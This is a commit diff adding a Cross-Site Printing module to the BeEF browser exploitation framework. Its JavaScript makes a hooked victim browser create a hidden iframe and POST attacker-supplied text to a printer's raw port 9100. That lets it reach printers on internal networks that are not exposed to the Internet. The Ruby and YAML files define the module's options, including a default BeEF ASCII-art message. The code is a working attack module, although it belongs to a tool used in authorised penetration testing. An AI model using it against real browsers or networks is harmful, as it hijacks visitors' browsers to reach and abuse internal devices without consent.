Added Cross-Site Printing module

modules/ipec/cross_site_printing/command.js

@@ -0,0 +1,69 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	var target_ip = "<%= @ip %>";
+	var target_port = "<%= @port %>";
+
+	// send a request
+	function send_msg(ip, port) {
+
+		// create iframe
+		var iframe = document.createElement("iframe");
+		iframe.setAttribute("id","ipc_cross_site_printing_<%= @command_id %>");
+		iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;");
+		document.body.appendChild(iframe);
+		iframe = document.getElementById("ipc_cross_site_printing_<%= @command_id %>");
+
+		// create form
+		var action = "http://" + ip + ":" + port + "/";
+		myform=document.createElement("form");
+		myform.setAttribute("name","data");
+		myform.setAttribute("method","post");
+		myform.setAttribute("enctype","multipart/form-data");
+		myform.setAttribute("action",action);
+		iframe.contentWindow.document.body.appendChild(myform);
+
+		// create message textarea
+		myExt = document.createElement("textarea");
+		myExt.setAttribute("id","msg_<%= @command_id %>");
+		myExt.setAttribute("name","msg_<%= @command_id %>");
+		myExt.setAttribute("wrap","none");
+		myExt.setAttribute("rows","70");
+		myExt.setAttribute("cols","100");
+		myform.appendChild(myExt);
+
+		// send message
+		iframe.contentWindow.document.getElementById("msg_<%= @command_id %>").value = "<%= @msg.gsub(/"/, '\\"').gsub(/\r?\n/, '\\n') %>";
+		myform.submit();
+
+		// clean up
+		setTimeout('document.body.removeChild(document.getElementById("ipc_cross_site_printing_<%= @command_id %>"));', 15000);
+	}
+
+	// validate target
+	if (!target_port || !target_ip || isNaN(target_port)) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed target host or target port');
+	} else if (target_port > 65535 || target_port < 0) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');
+	// send request and wait for reply
+	} else {
+		send_msg(target_ip, target_port);
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Message sent');
+	}
+
+});
+

modules/ipec/cross_site_printing/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        cross_site_printing:
+            enable: true
+            category: "IPEC"
+            name: "Cross-Site Printing (XSP)"
+            description: "Using Inter-protocol Exploitation/Communication (IPEC) the hooked browser will send a message to a listening print port (9100 by default) on the target specified in the 'Target Address' input field.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet."
+            authors: ["bcoles"]
+            target:
+                working: ["FF"]

modules/ipec/cross_site_printing/module.rb

@@ -0,0 +1,77 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Cross_site_printing < BeEF::Core::Command
+  
+  def self.options
+    return [
+	{'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'},
+	{'name'=>'port', 'ui_label' => 'Target Port', 'value' => '9100'},
+	{'name'=>'msg', 'ui_label' => 'Message', 'description' => 'Message to print', 'type'=>'textarea', 'value'=>"**********************************************************************
+
+                                     .O,
+                                     lkOl
+                                     od cOc
+                                     'X,  cOo.
+                                      cX,   ,dkc.
+              BeEF                     ;Kd.    ,odo,.
+                                        .dXl   .  .:xkl'
+                                          'OKc  .;c'  ,oOk:
+                                            ,kKo. .cOkc. .lOk:.
+                                              .dXx.  :KWKo. 'dXd.
+                                                .oXx.  cXWW0c..dXd.
+                                                  oW0   .OWWWNd.'KK.
+                                          ....,;lkNWx     KWWWWX:'XK.
+ ,o:,                          .,:odkO00XNK0Okxdlc,.     .KWWWWWWddWd
+  K::Ol                   .:d0NXK0OkxdoxO'             .lXWWWWWWWWKW0
+  od  d0.              .l0NKOxdooooooox0.        .,cdOXWWWWWWWWWWWWWx
+  :O   ;K;           ;kN0kooooooooooooK:  .':ok0NWWWWWWWWWWWWWWWWWWK.
+  'X    .Kl        ;KNOdooooooooooooooXkkXWWWWWWWWWWWWWWWWWWWWWWWNd.
+  .N. o. .Kl     'OW0doooooooooooooodkXWWWWWWWWWWWWWWWWWWWWWWWW0l.
+   0l oK' .kO:';kNNkoooooooooooook0XWWWWWWWWWWWWWWWWWWWWWWWKx:.
+   lX.,WN:  .:c:xWkoooooooooood0NWW0OWWWWWWWWWWWWWWWWWWWKo.
+    0O.0WWk'   .XKoooooooooooONWWNo  dWWWWWWWWWWWWWWWWWl
+     oKkNWWWX00NWXdooooooooxXWWNk'   dWWWWWWWWWWWWWWWWX
+      .cONWWWWWWWWOoooooooONWWK:...c0WWWWWWWWWWWWWWWWWW:
+         .;oONWWWWxooooodKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWX.
+              'XW0oooookNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWd
+              oW0ooooo0WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWO
+             ;NXdooodKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWx
+          ;xkOOdooooxOO0KNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWX.
+         .NOoddxkkkkxxdoookKWWWWWWWWWWWWWWWWWWWWWWWWWWX'
+          :KNWWWWWWWWWWX0xooONWWWWWWWWWWWWWWWWWWWWWWWk.
+         .xNXxKWWWWWWWOXWWXxoKWWWWWWWWWWWWWWWWWWWWNk'
+         OWl cNWWWWWWWk oNWNxKWWWWWWWWWWWWWWWWWNOl.
+        ,Wk  xWWWWWWWWd  xWWNWWWWWWWWWWWWXOdc,.
+        .N0   lOXNX0x;  .KWWWWWWWWWWWNkc.
+         :NO,         'lXWWWWWWWWWNk:.
+          .dXN0OkxkO0NWWWWWWWWWWKl.
+             .';o0WWWWWWWWWWWNk;
+                  .cxOKXKKOd;.
+
+**********************************************************************", 'width'=>'200px' },
+	]
+  end
+
+  def post_execute
+    content = {}
+    content['result'] = @datastore['result'] if not @datastore['result'].nil?
+    content['fail'] = @datastore['fail'] if not @datastore['fail'].nil?
+    if content.empty?
+      content['fail'] = 'No data was returned.'
+    end
+    save content
+  end
+end